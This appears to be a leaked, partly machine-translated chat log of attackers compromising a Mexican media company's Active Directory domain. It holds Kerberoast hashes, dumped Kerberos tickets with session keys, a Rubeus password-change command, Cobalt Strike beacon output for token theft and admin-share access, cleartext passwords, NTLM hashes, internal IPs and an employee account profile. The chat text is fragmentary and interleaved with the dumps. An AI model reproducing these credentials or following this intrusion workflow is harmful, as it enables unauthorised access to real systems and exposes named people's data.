                             1FAF55ABD1AB5E91C7EED4AABB0C77D9BA6C44770A4FFC6848F90DCAD36B8B706CD039A869FECFB6
                             B05903F25091851110A48D87B9336F42D423FDB7C6B49CA7D401CCB57A6C1718430D10BF19A3EDFE
                             E0B846C881C17D8324DCB3E7197837451AAF8532BC0E672672E5D25740033017FD0C3942D0CF661A
                             67F9848CD0A288C18EDB5FD3B55DDBF6FC126BF83201C7E409FC7A8295B03DC322DBFE8929827ED9
                             5058CF7F725F11F75B83B87920A35F0776DC676D4A6413D1DDC3CD109CA700B92169B818548257E5
                             26C4FBC10B1F50548B52D6163BBA957D541BC455F30F7F6B03CECBC762EA57C8A65968FB9D874996
                             97203C26893E08CD8611F7DD7F48690AAF4C6275FA17C0874A70FD16AA525668B37C84480D95A605
                             16626DB8B62426149E3887E81DEC1798E79510F82F5409E4E4028B0136E078F810DA0AF3BBBD0A3D
                             11A3939DAFACB79717267D1BF19475C6F98F6DABE8D342E727120C3723F207F633DC3E01DEE7D1D2
                             4EEA69AA85FD0B607699771F7A39AFF007407C58F1E9C38D64EEAA901F12A91D39E8060E8DB708BB
                             598AEBF7B1C5F6F4C52C71DD9AB817995F9817F15A06DEEBE8C12E3B1CFE5EE5C5BA79CC6BF8AE4B
                             22342099BFB9C2F9DD0E4E61F5495E8FE0627DE85E92B7ACC38D9E14207126D8186C0E961890D5FE
                             1A7ABD94E72EE5C81AC4E273E1DFBB4BF994A713BEB242C9E60F36DE060A752B711D8D5B1C83F01B
                             D1AD968498D4325E19A431D51A9DCE5A7EAD2F7714D3C038A4E48A89983D9A5C56FD80255397E53E
                             C75079B6CDFDFF680DAEBDA10E3B8EF7627A508E887C138CE1CD8E56DD7845B8028D98492001D58B
                             F4221DEF80FF5E20B083FFE90DF9EA15AA2B8A0004C750EABA59EC75FE4B72A73466A646128382FC
                             D0B5A485956B152476C3C3D593529691583F743D4A7BBDCA5DC7D9233905FC72DE6EE6019A76E086
                             E2A7BF031E6F7CE6A94820152267B669255D46CED47B7B28C7F4EF100C2945928A7634CDC22F6C89
                             7FCC9BCBE92CAA6C5DEC9AD6CA725600C97948E39DD4AB4A505F52011C8DCE0D9F8D5FC1FBAE8D28
                             98526442F98A1DAC0E2FC1354B77F2E67DCCA4227D981E5CDF2AD42A55D7396F9EE0AA4C3789E6E4
                             A157F7200D7FB4AFACC0F8426297FEA894DFA1EDB9F886EF859D6390F90C40E828914290AA4E5A77
                             DF2C4123F54D6C9EAA0DB25A1640BDA5871E53DF8751C41100AFED60409F63C1201E6A20B3E5CD64
                             933951D564F4A3D2F31875D0DCBA60C01540E1209CC9F87C98ACB32452BDB48A5494793EF1B8E59A
                             53098EE4C85D56707E0AED50E1799E136F6D244D1BBB7E3AC47D85AA622ADE9A33E332C2A06E84D3
                             7B05C20A1E66929AA8D2F12C082B4DDB73C29D72E48D3E75868652A12A43150C14C802F78DAA2BE9
                             1FAA1D70B2AA732356C1193BEE25C8E23FB21DB6D63C037ACE084B12FE5B3FF909863E17D3BB8621
                             B7C826F0676CF061AAAD4CCD5A23881469D8341EE4229C0851E49F16ABAFD69F37D47C84F2BA2521
                             9F39004124865AF6E39F0

``````
[*] SamAccountName : operaproy
[*] DistinguishedName : CN=Operador Proyectos,OU=Exclusiones 2016 Corp,DC=corp,DC=televisa,DC=com,DC=mx
[*] ServicePrincipalName : http/corpkionscep01
[*] PwdLastSet : 2/11/2021 5:25:45 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*operaproy$corp.televisa.com.mx$http/corpkionscep01*$AE3F395B8F841F2
                             BBF3B5D15CF33AF4D$E2E4DD0252CEBB03931A0BE1127FAC355AA2E7999A90E17114BDB7BEB3351D
                             EACE2F51673E0BE5035D5AFDD4E82F25B59370740C047C540CFD8DE7CB5B6BCAA95281EBD7261ADC
                             AAEB4F94903E291DC199DA75030FB19CC5CC693B57FB6EBC076A650CCF28AEA04FA476C3CA5FABEF
                             F7636496C8354D1EE4678D94F224F6B34D91749246F0E1FD0EFC694FA5CF7507C784D7B00E25E145
                             D14E8A30A4817A5D6AB0B6B1063C71DF771B77CF030A652A82C53BE0E508676D13ECA1578EE05489
                             1D99F382F2DE35E2D447BF885B8B4ECEE228A44A307AF1FAECD959389B4C748EF97AEDFD5021E948
                             D315F9A3037438A266DCC51B11F94F5F147A083CA34CBBCB8B1B04D75CD770F162661D1A9FE9FB81
                             DE3704381DFC8D1C3BA9295104A2F96A6E0DCA9E2D6BAF33F59DA9C1C3E6D9FC72C4589FE4EE25E6
                             07671D828E3C6B80E64FB761B3891D953B0E90D1052B88B20BA0C9F269E4C9BCCEC5F9CA622F4187
                             C2CEDADFC389ACAA03E764B75D24777E5D0665802A9DB84F2791B7303255B16BE250D5C1A9583CAA
                             3F0E344438C4DDB060BAF9DB9997EAE83B2EB28A7044E576BE05B81735A36FFCCF077FDAD0D03D10
                             DE8C4D71E75055B2BB0DBE2F75615159B28F15635917100C2AA3E5FC05154E94A85635173F3DCC2C
                             95E727F2D35168FA987E8322D3B2059137D40D1954B8E4CA4DF22B7CA63890C53B676DE2D61A019D
                             230817B4DD20E3563FEC2B6DFD6AF48B21213677CB17FFAC1BD80D395901CD85AFA6F4AD3E6FA3C4
                             812CAAFF3519F5365960D881D6EF4BEA00811827DB46587E707A7264A25803FB576C6451163138EB
                             A824517A5BC6671A4B8C4D15A40F2CA88D9BF075AE2A61EBC34898E3D1568F308326818DE2F42ED2
                             F45D47604B81678484A3EB2C519206254FFCE0F0E411B5454F3B59986F70B36D287EC32354498B95
                             FC25B107D13A431E4BE109C79D6FCFAF3377132F8B072AE121E098E18F4C6F9BF316A2EAE74DC52D
                             125813BF9515E472B1C034E0C8961082A1BF06125FD2C0D6D251A91B6A206B3E91BF0E3F7E3FA3BF
                             4FDDFD00ED37F47B650618EAD5FD39A74578D1AB278DFCAC20B09F0CF4A75FD8B28A29C8BB1A9002
                             4CE321685972C66EE40FE6BB9EDE9F108A2DFEE44F44C5098254E7448AAB772013E6B229DE516E1D
                             B7E7FC33FB2F39E1F0E63C026940A4EE97A7C762F4074284443169EF4BBEC9EC41EEB523C6B28CD5
                             82AB2D1CF56F2E9216F53BB4CE6D3F509B9A83CDC8ECBE6D733A84248763A1EE20BC667EE48659C1
                             B6BCD85AF942CFC193BEEE7AAC69A22B2BCF0602AAF564DA3988B6C7E6E1323E080AC6DFF52DA8C0
                             16C77DEF165F8BE2764BC71C1257B8F272B35B5C09BD5AC361577DE2FFFCFBF970524AA5DA5F78B9
                             4FC059AEBB8E86A4B20DDDFB841A10CF66D6326DD7E33544BA8BF177142009C9E011286B0EB8DD59
                             9CAEAEBE8B1E0C8047604E5FFCE4BB21229FC8D1B4795F4F7500B958BC4541D27096AEA010875C9F
                             D10D880CC601C28B6475226B9CC35D2C09DA9F39B4440B2D5044F3437362850E557A96B80EAE8C5F

``https://prog.world/we-analyze-attacks-on-kerberos-using-rubeus-part-2/
LOL the site is in english and the screens are russian))) https://habr.com/ru/company/tomhunter/blog/507140/ ``.
C:\Rubeus>Rubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123!
``https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.htmlесли for today you will close then change it)`` that's how you can change their passwords ho
  UserName : iwam_gsccorp
  Domain : CORP
  LogonId : 0x5f97dbc1
  UserSID : S-1-5-21-1935655697-1715567821-1801674531-500
  AuthenticationPackage : Negotiate
  LogonType : NewCredentials
  LogonTime : 2/11/2021 5:06:01 PM
  LogonServer :
  LogonServerDNSDomain : CORP.TELEVISA.COM.MX
  UserPrincipalName : IWAM_GSCCORP@televisa.com.mx


    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : scvmmadmin
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/12/2021 3:13:41 AM
    EndTime : 2/12/2021 1:13:41 PM
    RenewTill : 2/18/2021 5:28:41 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : rc4_hmac
    Base64(key) : z5AbAFLr5dm7xXuxnit3ZA==
    Base64EncodedTicket :

      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

``or on third-party resources, see githabc with this now
UserName : iwam_gsccorp
  Domain : CORP
  LogonId : 0xeccec
  UserSID : S-1-5-21-1935655697-1715567821-1801674531-500
  AuthenticationPackage : Kerberos
  LogonType : RemoteInteractive
  LogonTime : 1/29/2021 7:45:21 PM
  LogonServer : CORPKIODC04
  LogonServerDNSDomain : CORP.TELEVISA.COM.MX
  UserPrincipalName : IWAM_GSCCORP@televisa.com.mx


    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : IWAM_GSCCORP
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/12/2021 6:50:28 AM
    EndTime : 2/12/2021 4:50:28 PM
    RenewTill : 2/12/2021 7:43:12 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : aes256_cts_hmac_sha1
    Base64(key) : ecn2+faPRhcghzhFYY/6UjN8CqJC84CWfYAgujCMjd4=
    Base64EncodedTicket :

      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


``````
FILIAL\jcgarciae TVSAcrm8888!
FILIAL\Ivargasv 2d0a7cb1ea602f59dc9c7ee5bd11597b
```
 ```
133.1.11.173
133.1.45.190
10.10.10.154
10.10.47.53
10.10.47.122
10.4.30.153
10.4.31.100
10.4.6.116
10.4.28.122
``Works Check the koba again``Tekesquitengo:1031:aad3b435b51404eeaad3b435b51404ee:8275f6a85d07a3b71dd639e9b0304b47:::``after you click on endpoint nothing happens what is the error?
forkcar.com
192.111.151.198:22220
Ms4g6n8CfMfQGukSAeM8EEu7VzWCLL7ArdH
\TVSADMIN 616d703b0c6c52f0db8ff43611ab4031 ``so you used a token```
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:09> steal_token 4512
[*] Tasked beacon to steal the steal_token from PID 4512
[+] host called home, sent: 24 bytes
[+] Impersonated CORP\T1812

Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 18:45:48> shell dir \\10.7.0.55\C$
[*] Tasked beacon to run: dir \\10.7.0.55\C$
[+] host called home, sent: 61 bytes
[+] received output:
The user name or password is incorrect.

```
well I tried (``.
The request will be processed at a domain controller for domain corp.televisa.com.mx.

User name t1812
Full Name Servicio T1812
Comment Santa Fe Rep:4336636 Res1:JAVIER CRUZ BARRANCO Res2:ADRIAN RUIZ MONDRAGON (Alta) 08/01/2019 // Se agrego al grupo Domain Admins a peticion de Hugo Martinez Rocha por Correo electronico.
User's comment
Country/region code (null)
Account active Yes
Account expires Never

Password last set 2/12/2021 1:18:50 AM
Password expires 6/12/2021 1:18:50 AM
Password changeable 2/13/2021 1:18:50 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/11/2021 9:31:41 AM

Logon hours allowed All

Local Group Memberships *Account Operators *Server Operators
Global Group memberships *Servicio Basico *Domain Users
                             *User_PSO *Domain Admins
                             *Protected Users
``````
Teemo1[CORPAZUUPM]SYSTEM */484|2021Feb12 06:04:10> shell dir \\10.30.64.10\C$\Users
[*] Tasked beacon to run: dir \\10.30.64.10\C$\Users
[+] host called home, sent: 69 bytes
[+] received output:
 Volume in drive \10.30.64.10\C$ is Windows
 Volume Serial Number is 56D1-9C35

 Directory of \10.30.64.10\C$Users

02/11/2021 03:46 PM <DIR> .
02/11/2021 03:46 PM <DIR> .
11/21/2016 02:17 AM <DIR> public
05/22/2020 01:34 PM <DIR> SOPORTE-CITRIX
02/11/2021 03:46 PM <DIR> T1812
04/09/2020 09:36 PM <DIR> TVSADMIN
               0 File(s) 0 bytes
               6 Dir(s) 113,737,977,856 bytes free

```
this car should try to yank tickets tomorrow by 6na today all and watch interesting tickets check all servers[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=XrMJvE4ZDqCsAr6RT) what are you rich?
    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : CORPKLHLQRD01$
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/11/2021 7:38:29 PM
    EndTime : 2/12/2021 5:38:29 AM
    RenewTill : 2/18/2021 7:38:29 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : aes256_cts_hmac_sha1
    Base64(key) : LJqX9Tm3yHdb3yUrp7QfI9Dz+5PB9czvC77TDF2/W0M=
    Base64EncodedTicket :

      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
      VklTQS5DT00uTVg=

``Wrong userName : CORPKLHLQRD01$ ``Yes, here's the vb64 ticket
    ServiceName : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm : CORP.TELEVISA.COM.MX
    UserName : CORPKLHLQRD01$
    UserRealm : CORP.TELEVISA.COM.MX
    StartTime : 2/11/2021 7:38:28 PM
    EndTime : 2/12/2021 5:38:28 PM
    RenewTill : 2/18/2021 7:38:28 PM
    Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType : aes256_cts_hmac_sha1
    Base64(key) : 4LEdV2c6AR7LiGz0eUuKQNyO3Mrufj6J0E9qAqwDuo=
    Base64EncodedTicket :

      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
      VklTQS5DT00uTVg=
``[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=GmgDqd9y47E9i84we) I'm talking about this Ticket Granting
Group 2 - Ticket Granting Ticket
	 [00000000]
	   Start/End/MaxRenew: 2/11/2021 7:38:47 PM ; 2/12/2021 5:38:28 AM ;
